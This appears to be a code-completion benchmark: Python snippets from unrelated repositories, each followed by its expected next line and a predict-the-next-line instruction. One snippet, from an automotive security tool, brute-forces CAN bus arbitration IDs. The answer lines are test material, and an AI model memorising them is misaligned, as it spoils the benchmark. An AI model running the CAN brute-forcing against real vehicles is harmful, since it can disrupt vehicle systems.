def element(self):
return elements.SYMBOLS[self.symbol]
# Path: lapnet/configs/benzene_dimer/benzene_dimer.py
from lapnet import base_config
from lapnet.utils import system
from lapnet.utils.system import Atom
# Copyright 2023 Bytedance Ltd. and/or its affiliate
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Settings in a a config files are loaded by executing the the get_config
# function.
# Geometry of Benzene sigle molecule is from https://pubs.acs.org/doi/10.1021/acs.jpclett.0c02621,
# which is at the MP2/6-31G* level.
def get_config(input_str):
'''
Return config for benzene dimer with different bond lenth.
Using input_str to set the bond length,
e.g. --config lapnet/configs/benzene_dimer/benzene_dimer.py:4.95
'''
r_str= input_str
r = float(r_str)
# Get default options.
| cfg = base_config.default() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: svetlovtech/gptize
# Path: gptize/models.py
class File:
"""Class representing a file in the project."""
def __init__(self, file_name: str, directory: str):
self.file_name = file_name
self.directory = directory
self.content = ""
self.content_size = 0
self.is_binary = False
def __str__(self):
return f"File(name={self.file_name}, size={self.content_size} bytes)"
def __repr__(self):
return f"<File '{self.file_name}' at {self.directory}>"
# Path: gptize/models.py
class Project:
"""Class representing the project."""
def __init__(self, name: str, root_path: str):
self.name: str = name
self.files: List[File] = []
self.root_path: str = root_path
def __str__(self):
file_list = ', '.join(file.file_name for file in self.files)
return f"Project '{self.name}' with files: {file_list}"
def __repr__(self):
return f"<Project '{self.name}' with {len(self.files)} files>"
# Path: gptize/settings.py
class Settings:
DEFAULT_ENCODINGS = ['utf-8', 'latin-1', 'cp1252']
IGNORED_DIRECTORIES = ['.git', '.svn', '__pycache__']
GITIGNORE_PATH = '.gitignore'
MAX_FILE_SIZE_BYTES_LIMIT = 512 * 1024 * 1024 # 512 MB
MAX_TOKEN_COUNT_LIMIT = 2000000 # 2 million tokens
@staticmethod
def default_output_file():
current_time = datetime.now().strftime("%Y%m%d-%H%M%S")
return f"gptize-output-{current_time}.txt"
@staticmethod
def custom_output_file(target: str):
base_name = os.path.basename(target).replace(
' ', '_')
if not base_name or os.path.isdir(target):
base_name = 'folder' if os.path.isdir(target) else 'file'
current_time = datetime.now().strftime("%Y%m%d-%H%M%S")
return f"gptize-output-{base_name}-{current_time}.txt"
# Path: gptize/output_builder.py
class OutputBuilder:
def __init__(self):
self.content = ""
def write_common_header(self):
"""Write a common header to the content."""
self.content += "This file was generated using third party tool 'gptize'. For more information, visit https://github.com/svetlovtech/gptize\n"
self.content += "=" * 40 + "\n"
def write_project_header(self, project: Project):
"""Write a header for the project."""
self.content += f"Project Name: {project.name}\n"
self.content += f"Total Files: {len(project.files)}\n"
self.content += "=" * 40 + "\n"
def write_file_content(self, file: File):
if file.is_binary:
self.content += f"File: {file.directory} (Binary file present)\n"
else:
self.content += f"File: {file.directory}\n"
self.content += file.content + "\n"
def write_separator(self):
"""Write a separator."""
self.content += "=" * 40 + "\n"
def get_content(self) -> str:
"""Get the final combined content."""
return self.content
def __str__(self):
"""String representation of the OutputBuilder."""
return f"OutputBuilder with {len(self.content)} characters of content"
def __repr__(self):
"""Formal string representation of the OutputBuilder."""
return f"<OutputBuilder with {len(self.content)} characters>"
# Path: gptize/gptizer.py
import logging
import os
import pathspec
from .models import File, Project
from .settings import Settings
from .output_builder import OutputBuilder
class GPTizer:
def __init__(self):
self._project = None
self._gitignore = None
def process_directory(self, root_path: str):
"""
Processes all the files within a given directory. This method initializes
the Project object for the specified directory, loads the .gitignore patterns,
and populates the project with files that are not ignored by .gitignore.
The method traverses through the directory recursively and adds all relevant
files to the project's file list, ensuring that binary files and files
specified in .gitignore are not included.
Parameters:
root_path (str): The path to the root of the directory to be processed.
Raises:
FileNotFoundError: If the specified directory does not exist.
Exception: For any other issues encountered during the directory processing.
"""
project_name = os.path.basename(root_path)
self._project = Project(project_name, root_path)
self._gitignore = self.load_gitignore(root_path)
self.populate_files()
def process_file(self, file_path: str):
"""
Processes a single file. This method creates a Project object for the file,
treating the file as an individual project. It bypasses .gitignore processing,
as it is assumed that the specific file is intentionally selected for processing.
The method creates a File object for the specified file, reads its content,
and adds it to the project's file list. It handles binary and text files
accordingly.
Parameters:
file_path (str): The path to the file to be processed. This includes both
the directory path and file name.
Raises:
FileNotFoundError: If the specified file does not exist.
IOError: If there is an issue reading the file.
Exception: For any other unexpected issues encountered during file processing.
"""
root_path, file_name = os.path.split(file_path)
project_name = os.path.basename(root_path) if root_path else 'SingleFileProject'
self._project = Project(project_name, root_path or '.')
self._gitignore = pathspec.PathSpec.from_lines('gitwildmatch', [])
| file_obj = File(file_name, file_path) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: civrealm/civrealm
# Path: src/civrealm/envs/freeciv_wrapper/core.py
class Wrapper(gymnasium.Wrapper):
def reset(self, *, seed=None, options=None, **kwargs):
return self.env.reset(seed=seed, options=options, **kwargs)
# Path: src/civrealm/envs/freeciv_wrapper/utils.py
def onehotifier_maker(category):
if isinstance(category, int):
def onehot(obs):
if isinstance(obs, np.ndarray):
shape = obs.shape
else:
shape = (1,)
obs = int(obs)
result = (
np.zeros([*shape, category], dtype=np.int32)
if shape != (1,)
else np.zeros([category], dtype=np.int32)
)
with np.nditer(obs, op_flags=["readonly"], flags=["multi_index"]) as it:
for x in it:
if x != 255:
index = (
(
*(it.multi_index),
x,
)
if shape != (1,)
else (x,)
)
result[index] = 1
return result
elif isinstance(category, list):
def onehot(obs):
if isinstance(obs, np.ndarray):
shape = obs.shape
else:
shape = (1,)
result = (
np.zeros([*shape, len(category)], dtype=np.int32)
if shape != (1,)
else np.zeros([len(category)], dtype=np.int32)
)
with np.nditer(obs, op_flags=["readonly"], flags=["multi_index"]) as it:
for x in it:
index = (
(
*(it.multi_index),
category.index(x),
)
if shape != (1,)
else (category.index(x),)
)
result[index] = 1
return result
else:
raise NotImplementedError(f"Not implemented yet for type {type(category)}")
return onehot
# Path: src/civrealm/envs/freeciv_wrapper/tensor_base_wrapper.py
import numpy as np
from civrealm.envs import FreecivBaseEnv
from civrealm.envs.freeciv_wrapper.config import default_tensor_config
from .core import Wrapper
from .utils import onehotifier_maker
class TensorBase(Wrapper):
"""
A basic wrapper that deals with config loading and entity id recording,
required by all tensor-related wrappers.
Parameters
----------
env: FreecivBaseEnv
config: dict
tensor env configuration
Attributes
---------
config: dict
A dict that specifies all configurations related to tensor wrapper.
my_player_id: int
My player id.
unit_ids: list
A sorted list of my unit ids.
city_ids: list
A sorted list of my city ids.
others_unit_ids: list
A sorted list of others unit ids.
others_city_ids: list
A sorted list of others city ids.
dipl_ids : list
A list of others player ids.
units : dict
ruleset information about units.
unit_types :list
A list of all unit types.
unit_costs : list
A list of int indicating unit costs.
improvements : dict
Ruleset information about city improvements.
impr_costs :list
A list of int indicating city improvements costs.
"""
def __init__(self, env: FreecivBaseEnv, config: dict = default_tensor_config):
self.config = config
self.my_player_id = -1
# mutable ids
self.unit_ids = []
self.city_ids = []
self.others_unit_ids = []
self.others_city_ids = []
self.dipl_ids = []
# ruleset
self.units = {}
self.unit_types = []
self.unit_costs = []
self.improvements = {}
self.impr_costs = []
super().__init__(env)
def update_sequence_ids(self, observation):
"""
Use city, unit and dipl information in observation to update ids.
"""
self.unit_ids = sorted(
list(
k
for k in observation.get("unit", {}).keys()
if observation["unit"][k]["owner"] == self.my_player_id
)
)
self.others_unit_ids = sorted(
list(
k
for k in observation.get("unit", {}).keys()
if observation["unit"][k]["owner"] != self.my_player_id
)
)
self.city_ids = sorted(
list(
k
for k in observation.get("city", {}).keys()
if observation["city"][k]["owner"] == self.my_player_id
)
)
self.others_city_ids = sorted(
list(
k
for k in observation.get("city", {}).keys()
if observation["city"][k]["owner"] != self.my_player_id
)
)
self.dipl_ids = [
player
for player in sorted(observation.get("dipl", {}).keys())
if player != self.my_player_id
]
def update_config(self):
"""
Update config using ruleset information at the start of the turn.
"""
self.units = self.unwrapped.civ_controller.rule_ctrl.unit_types
self.unit_types = [self.units[i]["name"] for i in range(len(self.units))]
self.unit_costs = [self.units[i]["build_cost"] for i in range(len(self.units))]
self.improvements = self.unwrapped.civ_controller.rule_ctrl.improvements
self.impr_costs = [
self.improvements[i]["build_cost"] for i in range(len(self.improvements))
]
| self.config["obs_ops"]["unit"]["type_rule_name"] = onehotifier_maker( |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Sheppsu/discord-ext-listening
# Path: discord/ext/listening/enums.py
class RTCPMessageType(Enum):
sender_report = 200
receiver_report = 201
source_description = 202
goodbye = 203
application_defined = 204
# Path: discord/ext/listening/opus.py
class Decoder(BaseDecoder):
def packet_get_nb_channels(self, data: bytes) -> int:
return self.CHANNELS
# Path: discord/ext/listening/sink.py
import asyncio
import logging
import os
import queue
import struct
import subprocess
import threading
import wave
from collections import defaultdict
from dataclasses import dataclass
from time import monotonic
from typing import TYPE_CHECKING, Any, BinaryIO, Callable, Dict, List, Optional, Sequence, Tuple, Union
from discord.errors import ClientException
from discord.object import Object
from discord.player import CREATE_NO_WINDOW
from .enums import RTCPMessageType
from .opus import Decoder as OpusDecoder
from discord.member import Member
c: :class:`int`
The total number of RTP data packets from source SSRC that have
been lost since the beginning of reception.
ehsn: :class:`int`
The low 16 bits contain the highest sequence number received in an RTP
data packet from source SSRC, and the most significant 16 bits extend
that sequence number with the corresponding count of sequence number cycles.
j: :class:`int`
An estimate of the statistical variance of the RTP data packet interarrival
time, measured in timestamp units and expressed as an unsigned integer.
lsr: :class:`int`
The middle 32 bits out of 64 in the NTP timestamp received as part of the most
recent RTCP sender report (SR) packet from source SSRC. If no SR has been
received yet, the field is set to zero.
dlsr: :class:`int`
The delay, expressed in units of 1/65536 seconds, between receiving the last
SR packet from source SSRC and sending this reception report block. If no
SR packet has been received yet from SSRC, the DLSR field is set to zero.
"""
__slots__ = (
"ssrc",
"f",
"c",
"ehsn",
"j",
"lsr",
"dlsr",
)
ssrc: int
f: int
c: int
ehsn: int
j: int
lsr: int
dlsr: int
@dataclass
class RTCPSourceDescriptionItem:
"""An item of a :class:`RTCPSourceDescriptionChunk` object
Attributes
----------
cname: :class:`int`
Type of description.
description: :class:`bytes`
Description pertaining to the source of the chunk containing this item.
"""
__slots__ = (
"cname",
"description",
)
cname: int
description: bytes
@dataclass
class RTCPSourceDescriptionChunk:
"""A chunk of a :class:`RTCPSourceDescriptionPacket` object.
Contains items that describe a source.
Attributes
----------
ssrc: :class:`int`
The source which is being described.
items: Sequence[:class:`RTCPSourceDescriptionItem`]
A sequence of items which have a description.
"""
__slots__ = (
"ssrc",
"items",
)
ssrc: int
items: Sequence[RTCPSourceDescriptionItem]
class RTCPPacket:
"""Base class for all RTCP packet classes. Contains header attributes.
Read in detail here: https://www.freesoft.org/CIE/RFC/1889/19.htm
Attributes
----------
v: :class:`int`
Identifies the version of RTP, which is the same in RTCP packets
as in RTP data packets.
p: :class:`bool`
If the padding bit is set, this RTCP packet contains some additional
padding octets at the end which are not part of the control information.
The last octet of the padding is a count of how many padding octets
should be ignored.
rc: :class:`int`
Indicates the number of "items" within a packet. For sender and receiver
packets it indicates the number of Receiver Report Blocks.
pt: :class:`RTCPMessageType`
Indicates the RTCP packet type.
l: :class:`int`
The length of this RTCP packet in 32-bit words minus one, including
the header and any padding.
"""
__slots__ = (
"v",
"p",
"rc",
"pt",
"l",
)
if TYPE_CHECKING:
v: int
p: bool
rc: int
| pt: RTCPMessageType |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: RAIVNLab/MatFormer-OLMo
# Path: olmo/aliases.py
# Path: olmo/util.py
def barrier() -> None:
if dist.is_available() and dist.is_initialized():
dist.barrier()
# Path: olmo/util.py
def get_global_rank() -> int:
return int(os.environ.get("RANK") or dist.get_rank())
# Path: olmo/util.py
def get_world_size() -> int:
if dist.is_available() and dist.is_initialized():
return dist.get_world_size()
else:
return 1
# Path: olmo/data/iterable_dataset.py
import logging
import math
import numpy as np
import torch
import torch.utils.data
from pathlib import Path
from typing import Any, Dict, Iterator, List, Optional, Sequence, Union
from ..aliases import PathOrStr
from ..util import barrier, get_global_rank, get_world_size
__all__ = ["IterableDataset"]
log = logging.getLogger(__name__)
class IterableDataset(torch.utils.data.IterableDataset[Dict[str, Any]]):
"""
Adapted from PyTorch's DistributedSampler, this wraps a Dataset or arbitrary sequence
as an IterableDataset that can be deterministically restarted at any point by setting `start_index`,
which should be a multiple of your global batch size.
Similarly `max_examples`, if set, should be a multiple of global batch size.
"""
def __init__(
self,
dataset: Union[Sequence[List[int]], Sequence[torch.Tensor], Sequence[Dict[str, Any]]],
*,
seed: int = 0,
start_index: int = 0,
max_examples: Optional[int] = None,
shuffle: bool = True,
drop_last: bool = False,
world_size: Optional[int] = None,
rank: Optional[int] = None,
work_dir: Optional[PathOrStr] = None,
):
self.dataset = dataset
self.seed = seed
self.start_index = start_index
self.max_examples = max_examples
self.shuffle = shuffle
self.drop_last = drop_last
self.rank = rank if rank is not None else get_global_rank()
self.world_size = world_size if world_size is not None else get_world_size()
# If the dataset length is evenly divisible by # of replicas, then there
# is no need to drop any data, since the dataset will be split equally.
if self.drop_last and len(self.dataset) % self.world_size != 0: # type: ignore[arg-type]
# Split to nearest available length that is evenly divisible by world size.
# This is to ensure each rank receives the same amount of data.
num_samples = math.ceil(
(len(self.dataset) - self.world_size) / self.world_size # type: ignore[arg-type]
)
else:
num_samples = math.ceil(len(self.dataset) / self.world_size) # type: ignore[arg-type]
self.total_size = num_samples * self.world_size
self.global_indices_file: Optional[Path] = None
if work_dir is not None:
self.global_indices_file = Path(work_dir) / "global_indices.npy"
if self.rank == 0:
log.info("Saving global data order indices...")
self.global_indices_file.parent.mkdir(parents=True, exist_ok=True)
global_indices = self._build_global_indices()
global_indices_mmap = np.memmap(
self.global_indices_file, dtype=np.uint64, mode="w+", shape=(len(global_indices),)
)
global_indices_mmap[:] = global_indices
global_indices_mmap.flush()
del global_indices_mmap
log.info("Global data order indices saved to '%s'", self.global_indices_file)
| barrier() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: 1in-oos/ccplus
# Path: caringcaribou/utils/constants.py
ARBITRATION_ID_MAX = 0x7FF
# Path: caringcaribou/utils/constants.py
ARBITRATION_ID_MAX_EXTENDED = 0x18DAFFF1
# Path: caringcaribou/utils/constants.py
ARBITRATION_ID_MIN = 0x700
# Path: caringcaribou/utils/constants.py
BYTE_MAX = 0xFF
# Path: caringcaribou/utils/constants.py
BYTE_MIN = 0x00
# Path: caringcaribou/utils/can_actions.py
from caringcaribou.utils.constants import ARBITRATION_ID_MAX, ARBITRATION_ID_MAX_EXTENDED, ARBITRATION_ID_MIN, BYTE_MAX, BYTE_MIN
from sys import stdout, version_info
import can
import time
if print_results:
time_left = end_time - time.time()
num_matches = len(blacklist)
print("\r{0:> 5.1f} seconds left, {1} found".format(time_left, num_matches), end="")
stdout.flush()
# Receive message
msg = bus.recv(0.1)
if msg is None:
continue
# Classify
if classifier_function(msg):
# Add to blacklist
blacklist.add(msg.arbitration_id)
if print_results:
num_matches = len(blacklist)
print("\r 0.0 seconds left, {0} found".format(num_matches), end="")
if len(blacklist) > 0:
print("\n Detected IDs: {0}".format(" ".join(sorted(list(map(hex, blacklist))))))
else:
print()
return blacklist
class CanActions:
def __init__(self, arb_id=None, notifier_enabled=True):
"""
CanActions constructor
:param arb_id: int default arbitration ID for object or None
:param notifier_enabled: bool indicating whether a notifier for incoming message callbacks should be enabled
"""
self.bus = can.Bus(DEFAULT_INTERFACE)
self.arb_id = arb_id
self.bruteforce_running = False
self.notifier = None
if notifier_enabled:
self.enable_notifier()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self.notifier is not None:
self.disable_notifier()
self.bus.shutdown()
def enable_notifier(self):
self.notifier = can.Notifier(self.bus, listeners=[])
def disable_notifier(self):
self.clear_listeners()
# Prevent threading errors by stopping notifier gracefully
self.notifier.stop(NOTIFIER_STOP_DURATION)
self.notifier = None
def add_listener(self, listener):
self.notifier.listeners.append(listener)
def clear_listeners(self):
self.notifier.listeners = []
def set_listener(self, listener):
self.clear_listeners()
self.add_listener(listener)
def send(self, data, arb_id=None, is_extended=None, is_error=False, is_remote=False):
if len(data) > 8:
raise IndexError("Invalid CAN message length: {0}".format(len(data)))
# Fallback to default arbitration ID (self.arb_id) if no other ID is specified
if arb_id is None:
if self.arb_id is None:
raise ValueError("Arbitration ID must be set through either 'arb_id' argument or self.arb_id")
arb_id = self.arb_id
# Force extended flag if it is unspecified and arbitration ID is larger than the standard format allows
if is_extended is None:
is_extended = arb_id > ARBITRATION_ID_MAX
msg = can.Message(arbitration_id=arb_id,
data=data,
is_extended_id=is_extended,
is_error_frame=is_error,
is_remote_frame=is_remote)
self.bus.send(msg)
def bruteforce_arbitration_id(self, data, callback, min_id, max_id,
callback_end=None):
# Set limits
if min_id is None:
min_id = ARBITRATION_ID_MIN
if max_id is None:
if min_id <= ARBITRATION_ID_MAX:
max_id = ARBITRATION_ID_MAX
else:
# If min_id is extended, use an extended default max_id as well
max_id = ARBITRATION_ID_MAX_EXTENDED
# Sanity checks
if min_id > max_id:
if callback_end:
callback_end("Invalid range: min > max")
return
# Start bruteforce
self.bruteforce_running = True
for arb_id in range(min_id, max_id + 1):
self.notifier.listeners = [callback(arb_id)]
# Use standard addressing (11 bits arbitration ID) instead of extended (29 bits) when possible
extended = False
if arb_id > ARBITRATION_ID_MAX:
extended = True
msg = can.Message(arbitration_id=arb_id, data=data, is_extended_id=extended)
self.bus.send(msg)
time.sleep(MESSAGE_DELAY)
# Return if stopped by calling module
if not self.bruteforce_running:
self.clear_listeners()
return
# Callback if bruteforce finished without being stopped
if callback_end:
self.clear_listeners()
callback_end("Bruteforce of range 0x{0:x}-0x{1:x} completed".format(min_id, max_id))
| def bruteforce_data(self, data, bruteforce_index, callback, min_value=BYTE_MIN, max_value=BYTE_MAX, |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: L1bra1/WeakMotion
# Path: weak_model.py
class PreSegNet(nn.Module):
def __init__(self, FGBG_category_num=2, height_feat_size=13):
super(PreSegNet, self).__init__()
self.FGBG_classify = FGBGEstimation(motion_category_num=FGBG_category_num)
self.stpn = STPN_Seg(height_feat_size=height_feat_size)
def forward(self, bevs):
bevs = bevs.permute(0, 1, 4, 2, 3) # (Batch, seq, z, h, w)
# Backbone network
x = self.stpn(bevs)
# FG/BG segmentation head
FGBG_class_pred = self.FGBG_classify(x)
return FGBG_class_pred
# Path: data/weak_utils.py
def remove_close(points, radius):
points = points.T
x_filt = np.abs(points[0, :]) < radius
y_filt = np.abs(points[1, :]) < radius
not_close = np.logical_not(np.logical_and(x_filt, y_filt))
points = points[:, not_close]
points = points.T
return points, not_close
# Path: data/weak_utils.py
def filter_pc(pc, extents):
filter_idx = np.where((extents[0, 0] < pc[:, 0]) & (pc[:, 0] < extents[0, 1]) &
(extents[1, 0] < pc[:, 1]) & (pc[:, 1] < extents[1, 1]) &
(extents[2, 0] < pc[:, 2]) & (pc[:, 2] < extents[2, 1]))[0]
pc = pc[filter_idx]
return pc, filter_idx
# Path: data/weak_utils.py
def convert_semantic_to_FGBG(cate):
# Label ID 0: nose; Label ID 1~23: foreground classes; Label ID 24~31: background classes
# reference https://github.com/nutonomy/nuscenes-devkit/blob/master/docs/instructions_nuscenes.md
# and https://github.com/nutonomy/nuscenes-devkit/blob/master/docs/instructions_lidarseg.md
fg_mask = (0 < cate) & (cate < 24)
return fg_mask.astype(np.int32) + 1
# Path: data/weak_utils.py
def gen_voxel_indices_for_pc(pc, voxel_size, extents):
# Convert 3D coordinate to voxel index
discrete_pc = np.floor(pc[:, :3] / voxel_size).astype(np.int32)
min_voxel_coord = np.floor(extents.T[0] / voxel_size)
voxel_indices = (discrete_pc - min_voxel_coord).astype(int)
return voxel_indices
# Path: data/weak_utils.py
def convert_semantic_to_FGBG_waymo(cate):
# Label ID 0: Background; 1: Vehicle; 2: Pedestrian; 3: Cyclist; 4: Sign, regarded as background
fg_mask = (0 < cate) & (cate < 4)
return fg_mask.astype(np.int32) + 1
# Path: predict_FGBG_mask.py
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import numpy as np
import time
import sys
import argparse
import os
from weak_model import PreSegNet
from data.weak_utils import remove_close, filter_pc, convert_semantic_to_FGBG, gen_voxel_indices_for_pc, convert_semantic_to_FGBG_waymo
from sklearn.metrics import confusion_matrix
from tqdm import tqdm
def check_folder(folder_path):
if not os.path.exists(folder_path):
os.mkdir(folder_path)
return folder_path
height_feat_size = 13 # The size along the height dimension
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--data', default='/path_to/nuScenes/weak-data/train', type=str, help='The path to the preprocessed sparse BEV training data')
parser.add_argument('-s', '--save_FB', default='/path_to/nuScenes/FGBG-data/', type=str, help='The path to the preprocessed sparse BEV training data')
parser.add_argument('--datatype', default='nuScenes', type=str, choices=['Waymo', 'nuScenes'])
parser.add_argument('--pretrained', default='pretrained/nuscenes_seg_0-01.pth', type=str)
parser.add_argument('--gpu', default='0')
args = parser.parse_args()
print(args)
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
datatype = args.datatype
def main():
# Specify gpu device
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
device_num = torch.cuda.device_count()
print("device number", device_num)
voxel_size = (0.25, 0.25, 0.4)
if datatype == 'nuScenes':
area_extents = np.array([[-32., 32.], [-32., 32.], [-3., 2.]])
elif datatype == 'Waymo':
area_extents = np.array([[-32., 32.], [-32., 32.], [-1., 4.]])
dims = (256, 256, 13)
| model = PreSegNet(FGBG_category_num=2, height_feat_size=height_feat_size) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: c3exchange/c3-smartcontracts-v1
# Path: contracts_unified/library/c3types.py
class SignedInstrumentAmount(abi.NamedTuple):
class LiquidationFactors(abi.NamedTuple):
class InstrumentListElement(abi.NamedTuple):
class UserInstrumentData(abi.NamedTuple):
class OnChainOrderData(abi.NamedTuple):
class WormholeAddress(abi.NamedTuple):
class DecodedWormholePayload(abi.NamedTuple):
# Path: contracts_unified/library/constants.py
ADDRESS_SIZE = 32
# Path: contracts_unified/core/state_handler/global_handler.py
from typing import cast
from pyteal import (
ABIReturnSubroutine,
App,
Assert,
Btoi,
Bytes,
Expr,
Global,
Int,
Len,
MinBalance,
Pop,
Seq,
abi,
)
from contracts_unified.library.c3types import (
InstrumentId,
InstrumentListElement,
LiquidationFactors,
)
from contracts_unified.library.constants import ADDRESS_SIZE
@staticmethod
def set_pricecaster_id(pricecaster_id) -> Expr:
"""Sets the App id of the pricecaster"""
return App.globalPut(KEY_PRICECASTER_ID, Btoi(pricecaster_id))
@staticmethod
def get_wormhole_bridge_id() -> Expr:
"""Gets the App id of the wormhole bridge"""
return App.globalGet(KEY_WORMHOLE_BRIDGE_ID)
@staticmethod
def set_wormhole_bridge_id(wormhole_bridge_id) -> Expr:
"""Sets the App id of the wormhole bridge"""
return App.globalPut(KEY_WORMHOLE_BRIDGE_ID, Btoi(wormhole_bridge_id))
@staticmethod
@ABIReturnSubroutine
def set_address(key, address) -> Expr:
"""Sets an address in the global storage checking the length"""
return Seq(
Assert(Len(address) == Int(ADDRESS_SIZE)),
App.globalPut(key, address)
)
@staticmethod
def get_signature_validator() -> Expr:
"""Checks the address of the signature validator"""
return App.globalGet(KEY_SIGNATURE_VALIDATOR)
@staticmethod
def set_signature_validator(signature_validator) -> Expr:
"""Sets the address of the signature validator"""
return cast(Expr, GlobalStateHandler.set_address(KEY_SIGNATURE_VALIDATOR, signature_validator))
@staticmethod
def get_operator_address() -> Expr:
"""Gets the address of the operator"""
return App.globalGet(KEY_OPERATOR_ADDRESS)
@staticmethod
def set_operator_address(operator_address) -> Expr:
"""Sets the address of the operator"""
return cast(Expr, GlobalStateHandler.set_address(KEY_OPERATOR_ADDRESS, operator_address))
@staticmethod
def get_quant_address() -> Expr:
"""Gets the quant address"""
return App.globalGet(KEY_QUANT_ADDRESS)
@staticmethod
def set_quant_address(quant_address) -> Expr:
"""Sets the quant address"""
return cast(Expr, GlobalStateHandler.set_address(KEY_QUANT_ADDRESS, quant_address))
@staticmethod
def get_fee_target() -> Expr:
"""Gets the fee target address"""
return App.globalGet(KEY_FEE_TARGET)
@staticmethod
def set_fee_target(fee_target_address) -> Expr:
"""Sets the fee target address"""
return cast(Expr, GlobalStateHandler.set_address(KEY_FEE_TARGET, fee_target_address))
@staticmethod
def get_withdraw_buffer() -> Expr:
"""Gets the withdraw buffer address"""
return App.globalGet(KEY_WITHDRAW_BUFFER)
@staticmethod
def set_withdraw_buffer(withdraw_buffer) -> Expr:
"""Sets the withdraw buffer address"""
return cast(Expr, GlobalStateHandler.set_address(KEY_WITHDRAW_BUFFER, withdraw_buffer))
@staticmethod
@ABIReturnSubroutine
def ensure_mbr_fund() -> Expr:
"""Ensures the current mbr is lower than the fund"""
return Assert(MinBalance(Global.current_application_address()) <= App.globalGet(KEY_MBR_FUND))
@staticmethod
def add_mbr_fund(mbr_fund) -> Expr:
"""Increments the mbr fund amount by an amount"""
return App.globalPut(KEY_MBR_FUND, App.globalGet(KEY_MBR_FUND) + mbr_fund)
@staticmethod
def get_liquidation_factors() -> Expr:
"""Gets the object representing the liquidation factors"""
return App.globalGet(KEY_LIQUIDATION_FACTORS)
@staticmethod
def set_liquidation_factors(factors) -> Expr:
"""Sets the global liquidation factors"""
factors_size = abi.make(LiquidationFactors).type_spec().byte_length_static()
return Seq(
Assert(Len(factors) == Int(factors_size)),
App.globalPut(KEY_LIQUIDATION_FACTORS, factors),
)
@staticmethod
@ABIReturnSubroutine
def get_instrument(
| instrument_id: InstrumentId, |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: gunderson-dettmer/CE2OCF
# Path: CE2OCF/ocf/mocks/company.py
def fake_phone_number() -> str:
"""
Generates a valid US phone number with the international calling code.
The format is +1 (XXX) XXX-XXXX, with the following rules for the area code:
1. The first digit cannot be 0 or 1.
2. The second digit cannot be 9.
3. The second and third digits cannot both be 0.
Returns:
str: A valid US phone number with international calling code.
"""
# Define the range for the first digit of area code (2-9)
first_digit = random.randint(2, 9)
# Define the range for the second and third digits of area code
# The second digit cannot be 9, and the (second, third) cannot be (0, 0)
while True:
second_digit = random.randint(0, 8)
third_digit = random.randint(0, 9)
if not (second_digit == 0 and third_digit == 0):
break
# Generate the seven digits following the area code
# The first digit of these seven digits cannot be 0 or 1 either.
second_set_first_digit = random.randint(2, 9)
remaining_six_digits = random.randint(0, 999999)
# Combine all parts to create the phone number
phone_number = f"+1 ({first_digit}{second_digit}{third_digit}) {second_set_first_digit}{remaining_six_digits:06d}"
return phone_number
# Path: CE2OCF/types/enums.py
class DoubleTriggerTypesEnum(str, enum.Enum):
NA = "N/A"
TWENTY_FIVE_PERCENT_12_MONTHS = "25% of unvested; Involuntary Termination within 12 months after CiC"
FIFTY_PERCENT_12_MONTHS = "50% of unvested; Involuntary Termination within 12 months after CiC"
ONE_HUNDRED_PERCENT_12_MONTHS = "100% of unvested; Involuntary Termination within 12 months after CiC"
TWENTY_FIVE_PERCENT_ANY_TIME = "25% of unvested; Involuntary Termination any time after CiC"
FIFTY_PERCENT_ANY_TIME = "50% of unvested; Involuntary Termination any time after CiC"
ONE_HUNDRED_PERCENT_ANY_TIME = "100% of unvested; Involuntary Termination any time after CiC"
CUSTOM = "Custom"
# Path: CE2OCF/types/enums.py
class PaidWithOptionsEnum(str, enum.Enum):
IP = "IP"
CASH = "Cash"
# Path: CE2OCF/types/enums.py
class SingleTriggerTypesEnum(str, enum.Enum):
NA = "N/A"
SIX_MONTHS_ALL_TIMES = "6 months; all times after CiC"
TWELVE_MONTHS_ALL_TIMES = "12 months; all times after CiC"
TWENTY_FOUR_MONTHS_ALL_TIMES = "24 months; all times after CiC"
ONE_HUNDRED_PERCENT_ALL_TIMES = "100%; all times after CiC"
SIX_MONTHS_INVOLUNTARY_TERMINATION = "6 months; Involuntary Termination"
TWELVE_MONTHS_INVOLUNTARY_TERMINATION = "12 months; Involuntary Termination"
TWENTY_FOUR_MONTHS_INVOLUNTARY_TERMINATION = "24 months; Involuntary Termination"
ONE_HUNDRED_PERCENT_INVOLUNTARY_TERMINATION = "100%; Involuntary Termination"
CUSTOM = "Custom"
# Path: CE2OCF/types/enums.py
class VestingTypesEnum(str, enum.Enum):
FOUR_YR_1_YR_CLIFF = "4yr with 1yr Cliff"
